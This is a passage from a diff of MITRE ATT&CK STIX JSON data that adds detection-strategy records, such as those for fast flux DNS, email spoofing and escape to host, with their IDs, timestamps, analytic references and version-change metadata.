+                        "x-mitre-analytic--63de336c-105c-4e8f-aefc-420a3eac32e9",
+                        "x-mitre-analytic--5a652a8f-a8e1-4010-bc2b-2ffaa2838333"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4556646a-39df-48bf-9df3-623d4da7a859",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0485",
+                            "external_id": "DET0485"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Dynamic Resolution using Fast Flux DNS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7e6e9c0e-737e-43ac-8cdd-5edbff4d6424",
+                        "x-mitre-analytic--8a226737-e2a7-4b70-8964-98c47444a638",
+                        "x-mitre-analytic--22d28e80-ecae-4fa4-8901-ef9125c99e9f",
+                        "x-mitre-analytic--f9534b4a-57ef-40a0-801a-d56a217304f0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c1d8aa38-aefb-4ea8-8c80-2dfa05eaaecb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0232",
+                            "external_id": "DET0232"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for ESXi Administration Command",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f25cf3cf-53b8-4fa4-be4c-d0a7a02bf739"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5307b508-28e8-44c6-9487-212ccd3ab86c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0558",
+                            "external_id": "DET0558"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for ESXi Hypervisor CLI Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2fa4d134-8583-4cbe-bc84-bfc799205116"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9a66295a-9f47-47a8-bda4-935cd311186a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0355",
+                            "external_id": "DET0355"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Email Bombing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1f515cf2-91a5-4bed-95a1-ed8fc8b24a87",
+                        "x-mitre-analytic--31e4c4dc-3094-45b2-9d4d-1b0bf8311498",
+                        "x-mitre-analytic--7e9cb99b-4040-4b73-bd70-1bd68ae0f373",
+                        "x-mitre-analytic--d41cdfc1-2a82-4442-a1ca-177fe59b8dff"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--54aaab69-62fb-4d40-b2e0-0d07594353ed",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0192",
+                            "external_id": "DET0192"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Email Hiding Rules",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a09ed72b-be04-475f-8c0a-11ed47b40bd1",
+                        "x-mitre-analytic--863a9028-6b2a-46c6-b696-dd310937fbf9",
+                        "x-mitre-analytic--487d9ddf-a790-4adc-9be4-ec5651e790f1",
+                        "x-mitre-analytic--747a2974-0c77-4c47-9c02-2775025327c6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6dec9c28-6dcb-4470-ad69-6cdb520adb53",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0431",
+                            "external_id": "DET0431"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Email Spoofing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c0055eb3-5579-48a8-b9d3-df6dd67bc388",
+                        "x-mitre-analytic--38300670-8c96-4f80-bc1b-d69242023a20",
+                        "x-mitre-analytic--0c4a2cfd-a064-4f45-9c07-eb5c1044dd61",
+                        "x-mitre-analytic--e7a0e155-e0bc-45b5-b0ef-98ec4f5eea63"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--99294309-83fd-46f3-9925-7443c03e5b79",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0214",
+                            "external_id": "DET0214"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Embedded Payloads",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8f84fc52-ab74-443b-b618-aa1c0941377a",
+                        "x-mitre-analytic--db9b55b0-7e54-4625-92d5-fbe9ed8ac868",
+                        "x-mitre-analytic--8cd6ae3d-7f14-42bf-9aff-870209fc333f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--08861418-398c-4972-8850-5e11f2d32944",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0273",
+                            "external_id": "DET0273"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Encrypted Channel across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--81233639-a08b-4a56-a5d4-ac2f9ae94a2b",
+                        "x-mitre-analytic--f0dacfba-bcc0-43cb-bad5-0cd3fe3a7f5f",
+                        "x-mitre-analytic--80c5c2fd-eb3a-4678-9d3b-6147a90284de",
+                        "x-mitre-analytic--b94bb114-7532-4934-9955-9c7031109b9e",
+                        "x-mitre-analytic--29a00bef-79bd-4eb9-bf92-01651cffe9b0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e5448ab8-39d6-4364-ae7f-0459687251f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0543",
+                            "external_id": "DET0543"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Encrypted Channel via Asymmetric Cryptography across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7e1c7338-11d5-4ab4-aefc-bbd81e26068d",
+                        "x-mitre-analytic--284edcb8-0141-4fe6-afb2-9fd8a2b82b49",
+                        "x-mitre-analytic--6b63caad-5d8d-4f23-be77-4e81d8904da6",
+                        "x-mitre-analytic--0f9943f2-0e7e-44da-b7dd-e1a7cd52aae0",
+                        "x-mitre-analytic--3e5930bf-6d79-4f75-9b9e-97cad9bf9232"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--32c549cd-a06b-41f2-8063-8937ba7feab6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0143",
+                            "external_id": "DET0143"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Encrypted Channel via Symmetric Cryptography across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--704bd588-a82b-4139-92ef-6dc6a48581c8",
+                        "x-mitre-analytic--8c64bf26-bda2-47fc-867d-bcc6a51d57a7",
+                        "x-mitre-analytic--531ba452-e3b8-4064-be28-31ddd13b3478",
+                        "x-mitre-analytic--50102ced-9c8f-47e6-b438-63b2a7fe983d",
+                        "x-mitre-analytic--94e5fd96-1fde-41fd-863d-6ef9cb8a3e1a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--28d6ebc3-3b01-45e1-b48e-6491364d23e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0304",
+                            "external_id": "DET0304"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Endpoint DoS via Application or System Exploitation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6bb68520-c27e-435a-86b5-eb2ce7841cb2",
+                        "x-mitre-analytic--2f4d199c-4d62-4d7d-8c6e-3ec358c22e76",
+                        "x-mitre-analytic--e6b92e19-5bc8-414b-b200-96ed6d286388",
+                        "x-mitre-analytic--f1aae71a-6460-4c08-9aa7-49743f766a71"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1a45b10a-c410-4212-8018-7c00bb292dab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0173",
+                            "external_id": "DET0173"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Endpoint DoS via Service Exhaustion Flood",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8c03988c-3387-48e4-8013-7b9d223b8911",
+                        "x-mitre-analytic--c7752951-1077-478d-9511-df852cba6b28",
+                        "x-mitre-analytic--00bf6b2e-444a-4a83-aafd-43bc8eea4594",
+                        "x-mitre-analytic--7dbd928f-da93-4cbf-af73-ac5987a7858a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8796c5cc-7e5a-402f-8252-f083aafc5cc9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0219",
+                            "external_id": "DET0219"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Escape to Host",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fc9161ef-3cab-45f5-a585-d78778d72f2b",
+                        "x-mitre-analytic--0021ecae-778a-4726-aa66-1cf4ca01943e",
+                        "x-mitre-analytic--81e2b983-2159-47d1-9ec1-a5c863faa1a7",
+                        "x-mitre-analytic--9f5f193f-6aef-4586-a047-492b0c651001"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--07fb6847-efcb-426e-9344-bfc9dfcdebd4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0369",
+                            "external_id": "DET0369"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Event Triggered Execution via Trap (T1546.005)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d1d19568-2b59-4d44-9744-22d7304d2200",
+                        "x-mitre-analytic--99c42b1f-1716-413b-8c23-5f7e1d997ab2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f0ef3932-5f60-4dfc-9725-8639d67349cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0555",
+                            "external_id": "DET0555"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Event Triggered Execution via emond on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5e4aea30-f04b-4f1e-b68a-f2f3a95e5066"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6f59bdfc-8352-4e6f-bef1-cc59b4e9b04d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0557",
+                            "external_id": "DET0557"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Event Triggered Execution: AppInit DLLs (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e886b9c8-2187-4363-9043-1e5c60d75363"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
